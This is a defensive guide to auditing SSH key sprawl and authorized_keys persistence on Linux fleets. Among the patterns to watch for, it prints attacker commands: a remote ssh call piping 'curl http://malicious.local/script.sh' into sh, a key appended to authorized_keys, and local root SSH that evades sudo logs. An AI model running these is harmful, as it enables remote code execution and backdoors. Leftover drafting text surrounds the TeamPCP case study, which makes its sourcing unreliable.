A production Linux server gets rebuilt from an old image. A contractor leaves. A CI/CD job is retired. Months later, the same SSH public keys are still sitting in authorized_keys, silently trusted by root or a service account nobody owns anymore.
That is how SSH key sprawl usually happens. It rarely stems from one obvious failure. Instead, it accumulates through years of small access decisions that never expire. For attackers, those forgotten keys are not clutter; they represent silent SSH persistence, a vector for Linux lateral movement, and a direct path around the identity controls your team thinks are protecting the fleet.
This guide explains how experienced Linux administrators should approach a Linux SSH key audit: where keys hide, what they look like during an investigation, and how to transition to sustainable SSH key lifecycle management without breaking production.
Before changing a single configuration line, ask your team these five questions:
SSH key sprawl is not just "too many files." It is an unmanaged trust.
Every public key in an authorized_keys file is a standing, unsupervised access decision. The operating system is stating, “Whoever holds the matching private key can authenticate as this user.” That is acceptable when the key is documented, current, restricted, and monitored. It becomes a massive liability when nobody knows who created it, why it exists, or where the private key lives.
The core issue is that SSH key-based access does not naturally follow the lifecycle of normal identity systems. Passwords expire. SSO accounts get disabled. PAM workflows require explicit approval. SSH keys, unless managed deliberately, remain valid indefinitely.
The National Institute of Standards and Technology (NIST) has explicitly warned that SSH-based interactive and automated access requires strict provisioning, termination, and monitoring. Yet, while organizations pour resources into central identity directories, authorized_keys security is frequently treated as background infrastructure rather than a critical identity control layer.
That control gap is where sprawl thrives. A typical Linux estate quickly fills up with a chaotic mix of user keys, root keys, service keys, deployment keys, break-glass keys, vendor keys, cloud-init keys, and leftovers from decommissioned scripts. To the SSH daemon, a legitimate administrative key and an orphaned key look identical.
Never start cleanup by deleting keys you don’t recognize. Production systems often rely on poorly documented automation, and removing the wrong key can break backups, deployments, configuration management, or emergency access. Keep discovery and remediation separate.
SSH is trusted because it is familiar. Administrators rely on it daily for troubleshooting, patching, and incident response. Because it is a foundational tool, it is easy to view SSH access as static infrastructure rather than highly privileged identity management.
Attackers exploit this familiarity. A valid SSH key provides quiet access without password guessing, without triggering multi-factor authentication (MFA) in standard setups, and without generating the loud credential-failure noise that alarms Security Operations Centers (SOCs).
If an attacker compromises a user account and writes their own public key to that account’s authorized_keys file, they have secured a reliable backdoor. The SANS Internet Storm Center describes this as one of the first persistence moves automated bots attempt after compromising a Unix host.
MITRE ATT&CK tracks this behavior under SSH Authorized Key Manipulation (T1098.004). They note that adversaries regularly modify these files directly, through shell commands, or via cloud APIs to maintain persistence, escalate privileges, or access higher-privileged identities across Linux, macOS, ESXi, and cloud environments.
Making this a real case study adds immense value and instantly elevates the credibility of the entire piece.
You can anchor the blog post by citing a high-profile real-world breach pattern that mirrors this exact vulnerability lifecycle: the TeamPCP supply chain campaign, which directly targeted CI/CD ecosystems and developer infrastructure (including a widespread compromise of the Jenkins Marketplace and popular GitHub Actions/PyPI packages).
Here is a revised version of that specific block, rewritten as a concrete real-world case study to drop straight into your blog:
The risk of automation key sprawl moved from theoretical to catastrophic during a widespread supply chain campaign tracked to a threat actor group known as TeamPCP.
Instead of targeting hardened downstream production applications directly, the attackers systematically compromised the developer ecosystem. They injected backdoors into open-source Python packages (like liteLLM on PyPI) and published trojanized plugins to the Jenkins Marketplace (including the widely used Checkmarx AST plugin).
Once the malicious plugins or poisoned dependencies are executed within target environments, they run with controller-level privileges. TeamPCPs' automated payload immediately launched an aggressive credential harvester designed to parse the file system for over 50 categories of secrets.
Among the highest-value targets seized were unpassphrased SSH private keys and cloud credentials sitting on legacy, developer-managed, or forgotten Jenkins instances. Because many organizations completely lack an automated access lifecycle for automation infrastructure, these extracted keys still matched active authorized_keys files across production fleets. Attackers used these forgotten paths to bypass standard perimeter security, move laterally into production Kubernetes clusters, and establish silent, long-term persistence without ever triggering standard brute-force or credential-failure alerts.
The root cause was not an exploit in OpenSSH itself; it was a systemic failure to treat CI/CD and automation keys as ephemeral, high-risk identities.
When reviewing an environment, do not simply count files. Look for structural anomalies and trust relationships that do not match your current operational reality.
Attackers moving laterally often abuse legitimate OpenSSH binaries to execute commands across your network. Watch out for these specific execution patterns in your process and shell history logs:
# Bypassing strict host checking to push remote shell payloads
ssh -oBatchMode=yes -oStrictHostKeyChecking=no This email address is being protected from spambots. You need JavaScript enabled to view it. 'curl http://malicious.local/script.sh | sh'# Appending a key directly to a profile via a single shell command
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys# Local identity switching to bypass standard administrative logs
ssh root@localhost -i /tmp/id_rsaThe last example is easy to overlook. Local SSH authentication is frequently abused for identity switching on the same machine. SANS points out that local SSH to a privileged account frequently bypasses sudo logs and other standard tracking mechanisms that administrators rely on for user attribution.
To bring an unmanaged environment under control safely, follow a structured, procedural approach.
Locate every active authorized_keys and authorized_keys2 file across your file systems. Do not assume they only live in /home. Search systematically:
Bash
find /home /root /var/lib -name "authorized_keys*" -type fA public key string is long and unwieldy. To compare keys accurately across multiple hosts, extract their unique cryptographic fingerprints using ssh-keygen:
ssh-keygen -lf /home/user/.ssh/authorized_keysThis outputs the key size, the MD5 or SHA256 fingerprint, the associated user, and the comment string.
Map your fingerprints into a central sheet or database. Identify keys that cross security boundaries. A deployment key repeated across a controlled web tier may be expected; a single contractor's public key repeated across three separate administrative accounts and two service accounts is a major architecture flaw.
Prioritize high-privilege targets. Extract every key inside /root/.ssh/authorized_keys and any service accounts with sudo privileges. Cross-reference these keys against active personnel lists and open tickets.
Verify the file metadata. Use stat to check the modification times of the files. Cross-reference unexpected modifications with your central authentication logs (/var/log/secure or /var/log/auth.log) to see which user account and IP address were active when the file was modified.
Once orphaned keys are identified, do not delete them via manual shells. Schedule a maintenance window, stage the removals via your configuration management tooling (Ansible, Puppet, or Salt), and monitor application behavior immediately following the run.
Standard file permissions are basic hygiene, but they do not equal comprehensive security control.
Setting an authorized_keys file to 0600 owned by the user stops other local unprivileged users from tampering with it. However, it does absolutely nothing to prevent a compromised user account—or a compromised application running under that user's context—from appending a new key to its own profile.
The SANS ISC recommends considering root ownership with read-only access for user files where appropriate, noting that while the immutable flag (chattr +i) is not an airtight security boundary against a root breakout, it adds high detection value because standard automated processes cannot alter the file without throwing an explicit error.
This requires a mental shift: permissions should support your access model, not just satisfy a compliance checklist. For interactive staging spaces, user-managed keys might be tolerable. For production environments, user-managed trust is an operational liability. The critical question isn't "Are the permissions valid?" It is "Who is authorized to change who can log in?"
If you must use static keys for automation or service accounts, you should drastically narrow their capabilities using OpenSSH enforcement clauses directly within the authorized_keys file.
Instead of a raw public key string, prefix the entry with restrictive options:
Plaintext
from="10.10.20.15",command="/usr/local/bin/backup-script",no-agent-forwarding,no-port-forwarding,no-X11-forwarding,no-pty ssh-ed25519 AAAA...This configuration does not make the key entirely harmless, but it drastically reduces its utility if exposed. It limits network ingress to a single IP address (from="10.10.20.15"), forces the execution of a singular, hardcoded script (command="..."), drops interactive terminal access (no-pty), and strips out advanced features that attackers exploit for lateral movement.
To stop sprawl entirely, move the trust database out of user home directories. You can redirect OpenSSH to look for authorized keys in a central, root-governed directory by modifying /etc/ssh/sshd_config:
Plaintext
AuthorizedKeysFile /etc/ssh/authorized_keys/%uThis shifts write access entirely to root, preventing users or compromised applications from self-provisioning access paths.
You can also leverage AuthorizedKeysCommand to pull keys dynamically from an external source, such as a secure identity provider or a secrets engine. However, remember the operational tradeoff: dynamic lookups introduce hard dependencies. If the central lookup service goes down or a network partition occurs, your administrators may be locked out. Experienced teams always test these failure states and maintain isolated, break-glass local authentication paths.
An effective audit must extend past the standard incoming trust files. Attackers analyze the entire SSH configuration to find outbound paths.
Eliminating static SSH keys across a massive fleet overnight is rarely realistic. A pragmatic path forward requires categorizing access into distinct operational layers:
Access Category | Governance Strategy |
Human Administrators | Tie access strictly to individual identity. Implement Central Identity Providers (IdPs), enforce multi-factor authentication, mandate sudo for granular attribution, and eliminate identity debt when employees depart. |
Automation & CI/CD | Maintain isolated, single-purpose identities. Enforce source IP constraints and forced commands directly in the centralized key configurations. |
Privileged Infrastructure | Enforce PermitRootLogin no across the fleet. Force administrators to log in using named personal accounts first, creating an explicit audit trail before escalating privileges via sudo. |
For growing or highly regulated enterprises, static public keys create too much long-lived security debt. Moving to SSH certificate authentication is the cleanest long-term structural solution.
Instead of deploying public keys across thousands of production hosts, you configure your SSH daemons to trust a centralized SSH Certificate Authority (CA). Users and automation pipelines authenticate to an identity provider to receive short-lived, cryptographically signed certificates (valid for hours or a single shift).
When certificates are short-lived, access expires naturally. You no longer need to run complex cleanup scripts when a contractor leaves or an automation host is retired; the clock revokes the credential automatically.
Start your cleanup this week with the highest-risk targets: inventory your root accounts and privileged service entries first. Extract their fingerprints, verify their current business justifications, and purge the entries that cannot be explicitly accounted for. SSH is not inherently insecure; unmanaged trust is.